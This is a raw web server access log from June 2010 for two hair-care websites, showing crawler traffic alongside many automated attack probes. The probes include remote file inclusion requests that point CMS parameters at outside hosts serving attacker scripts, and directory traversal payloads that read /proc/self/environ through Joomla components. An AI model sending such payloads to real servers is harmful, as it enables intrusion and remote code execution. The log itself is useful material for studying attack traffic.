194.201.253.2 - - [20/Jun/2010:19:51:03 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
201.116.197.150 - - [20/Jun/2010:19:52:57 -0700] "GET /logs/access_100426.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
201.116.197.150 - - [20/Jun/2010:19:52:57 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
201.116.197.150 - - [20/Jun/2010:19:52:57 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
77.88.25.28 - - [20/Jun/2010:19:53:42 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13734 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
174.120.153.34 - - [20/Jun/2010:19:54:59 -0700] "HEAD / HTTP/1.1" 200 0 "http://www.fresharticleshub.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.freehairsecrets.com"
194.201.253.2 - - [20/Jun/2010:19:58:57 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.201.253.2 - - [20/Jun/2010:19:58:57 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.201.253.2 - - [20/Jun/2010:19:58:57 -0700] "GET /include/admin.lib.inc.php?site_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.255.132.83 - - [20/Jun/2010:20:00:18 -0700] "GET /xmlrpc/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [20/Jun/2010:20:00:22 -0700] "GET /xmlrpc/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
194.201.253.2 - - [20/Jun/2010:20:02:34 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.201.253.2 - - [20/Jun/2010:20:02:34 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.201.253.2 - - [20/Jun/2010:20:02:34 -0700] "GET /include/admin.lib.inc.php?site_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:20:08:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15157 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.228.62.66 - - [20/Jun/2010:20:14:07 -0700] "GET /logs//include/write.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.62.66 - - [20/Jun/2010:20:14:07 -0700] "GET /include/write.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.62.66 - - [20/Jun/2010:20:14:07 -0700] "GET /logs/access_100125.log%20%20//include/write.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [20/Jun/2010:20:16:12 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [20/Jun/2010:20:17:03 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:20:19:35 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5038 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [20/Jun/2010:20:21:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13019 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
66.249.65.225 - - [20/Jun/2010:20:24:27 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "freehairsecrets.com"
76.12.28.36 - - [20/Jun/2010:20:24:49 -0700] "GET /logs/access_100531.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balem.net/apload/backup1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
76.12.28.36 - - [20/Jun/2010:20:24:49 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balem.net/apload/backup1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
76.12.28.36 - - [20/Jun/2010:20:24:49 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balem.net/apload/backup1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
76.12.28.36 - - [20/Jun/2010:20:24:51 -0700] "GET /logs/access_100531.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balem.net/apload/backup1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
76.12.28.36 - - [20/Jun/2010:20:24:51 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balem.net/apload/backup1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
76.12.28.36 - - [20/Jun/2010:20:24:51 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balem.net/apload/backup1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
76.12.28.36 - - [20/Jun/2010:20:24:54 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balem.net/apload/backup1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
76.12.28.36 - - [20/Jun/2010:20:24:56 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balem.net/apload/backup1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.96.119.121 - - [20/Jun/2010:20:25:08 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6561&sid=eb1edc4cdb974057eda12428e520dcb0 HTTP/1.0" 200 438 "http://www.freehairsecrets.com/freehairsecretsphp/viewtopic.php?p=6561&sid=eb1edc4cdb974057eda12428e520dcb0" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
78.96.119.121 - - [20/Jun/2010:20:25:08 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
76.12.28.36 - - [20/Jun/2010:20:25:40 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balem.net/apload/backup1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
76.12.28.36 - - [20/Jun/2010:20:25:40 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balem.net/apload/backup1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
76.12.28.36 - - [20/Jun/2010:20:25:40 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balem.net/apload/backup1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
76.12.28.36 - - [20/Jun/2010:20:25:44 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balem.net/apload/backup1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
76.12.28.36 - - [20/Jun/2010:20:25:44 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balem.net/apload/backup1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
76.12.28.36 - - [20/Jun/2010:20:25:45 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balem.net/apload/backup1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
163.20.26.5 - - [20/Jun/2010:20:29:15 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
163.20.26.5 - - [20/Jun/2010:20:29:28 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
163.20.26.5 - - [20/Jun/2010:20:29:34 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
67.195.37.176 - - [20/Jun/2010:20:30:03 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [20/Jun/2010:20:30:04 -0700] "GET /logs/?M=A HTTP/1.0" 200 6070 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
77.88.25.28 - - [20/Jun/2010:20:32:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6334 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:20:39:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:20:39:07 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
72.14.193.5 - - [20/Jun/2010:20:40:18 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 2120251 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp),gzip(gfe) (via docs.google.com/viewer)" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:20:40:30 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:20:40:48 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:20:40:56 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:20:41:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
67.195.115.55 - - [20/Jun/2010:20:43:09 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
67.195.115.55 - - [20/Jun/2010:20:43:09 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:20:44:48 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:20:45:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
114.108.151.149 - - [20/Jun/2010:20:46:48 -0700] "GET /logs/access.log/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [20/Jun/2010:20:46:49 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [20/Jun/2010:20:46:49 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:20:49:07 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:20:49:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:20:49:44 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:20:49:47 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
67.195.37.176 - - [20/Jun/2010:20:50:05 -0700] "GET /logs/access_100621.log HTTP/1.0" 200 4130305 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
114.108.151.149 - - [20/Jun/2010:20:50:20 -0700] "GET /logs/access.log/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [20/Jun/2010:20:50:21 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [20/Jun/2010:20:50:22 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
93.186.192.124 - - [20/Jun/2010:20:52:43 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
93.186.192.124 - - [20/Jun/2010:20:52:43 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
93.186.192.124 - - [20/Jun/2010:20:52:43 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
93.186.192.124 - - [20/Jun/2010:20:52:56 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
93.186.192.124 - - [20/Jun/2010:20:52:56 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
93.186.192.124 - - [20/Jun/2010:20:52:57 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:20:52:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:20:53:09 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
121.88.4.74 - - [20/Jun/2010:20:53:11 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.74 - - [20/Jun/2010:20:53:12 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
67.59.156.163 - - [20/Jun/2010:20:53:21 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.59.156.163 - - [20/Jun/2010:20:53:21 -0700] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.59.156.163 - - [20/Jun/2010:20:53:22 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:20:53:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
85.235.154.15 - - [20/Jun/2010:20:53:44 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.235.154.15 - - [20/Jun/2010:20:53:44 -0700] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.235.154.15 - - [20/Jun/2010:20:53:44 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:20:53:50 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
124.115.6.16 - - [20/Jun/2010:20:54:15 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "freehairsecrets.com"
85.235.154.15 - - [20/Jun/2010:20:54:51 -0700] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.235.154.15 - - [20/Jun/2010:20:54:51 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.235.154.15 - - [20/Jun/2010:20:54:51 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.59.156.163 - - [20/Jun/2010:20:56:03 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.59.156.163 - - [20/Jun/2010:20:56:04 -0700] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.59.156.163 - - [20/Jun/2010:20:56:04 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.160.123.72 - - [20/Jun/2010:20:57:30 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
85.235.154.15 - - [20/Jun/2010:20:59:57 -0700] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.115.55 - - [20/Jun/2010:21:00:24 -0700] "GET /?S=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
85.235.154.15 - - [20/Jun/2010:21:01:07 -0700] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
163.20.26.5 - - [20/Jun/2010:21:04:44 -0700] "GET /logs/access_100125.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
163.20.26.5 - - [20/Jun/2010:21:04:45 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
163.20.26.5 - - [20/Jun/2010:21:04:46 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:05:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:21:05:28 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
163.20.26.5 - - [20/Jun/2010:21:06:49 -0700] "GET /logs/access_100125.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
163.20.26.5 - - [20/Jun/2010:21:06:49 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
163.20.26.5 - - [20/Jun/2010:21:06:50 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
163.20.26.5 - - [20/Jun/2010:21:07:08 -0700] "GET /logs/access_100125.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
163.20.26.5 - - [20/Jun/2010:21:07:08 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
163.20.26.5 - - [20/Jun/2010:21:07:09 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:08:07 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:08:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
94.228.131.90 - - [20/Jun/2010:21:09:08 -0700] "GET /logs/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.228.131.90 - - [20/Jun/2010:21:09:08 -0700] "GET /skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.228.131.90 - - [20/Jun/2010:21:09:08 -0700] "GET /logs/access_100531.log/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.228.131.90 - - [20/Jun/2010:21:09:17 -0700] "GET /skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.228.131.90 - - [20/Jun/2010:21:09:17 -0700] "GET /logs/access_100531.log/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.228.131.90 - - [20/Jun/2010:21:09:17 -0700] "GET /logs/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.228.131.90 - - [20/Jun/2010:21:09:29 -0700] "GET /skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.228.131.90 - - [20/Jun/2010:21:09:29 -0700] "GET /logs/access_100531.log%20%20/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.228.131.90 - - [20/Jun/2010:21:09:29 -0700] "GET /logs/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:09:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:21:09:48 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
67.59.156.163 - - [20/Jun/2010:21:10:49 -0700] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.228.131.90 - - [20/Jun/2010:21:11:10 -0700] "GET /skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.228.131.90 - - [20/Jun/2010:21:11:10 -0700] "GET /logs/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
